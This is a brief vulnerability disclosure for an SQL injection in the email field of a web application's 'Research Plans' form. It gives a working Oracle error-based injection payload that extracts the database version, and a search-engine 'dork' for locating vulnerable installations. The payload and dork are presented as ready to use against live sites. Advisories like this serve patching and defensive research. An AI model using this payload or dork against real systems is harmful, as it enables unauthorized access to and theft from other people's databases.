# Author: K053<K053.dev0te3 at gmail>
# Vendor : SIDA < >
# Version: All below 1389 are vulberable
Note: Seems vendor patched this vulnerability in newest update [ 1389]
so we decide to public it now. Maybe more in future ;)
Detail: Application is vulnerable in several section. seems developer
fixed most of them but until version 1389 Research Plans section is
vulnerable. In Research Plans section there is form which there is no
input validation in email field.
POC: Application powered by Oracle DBMS. Submit this query in email field
and let password field empty to get DBMs version.
'or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
Dork: just search for "سیدا"
~Blackout Frenzy[http://b0f.ir]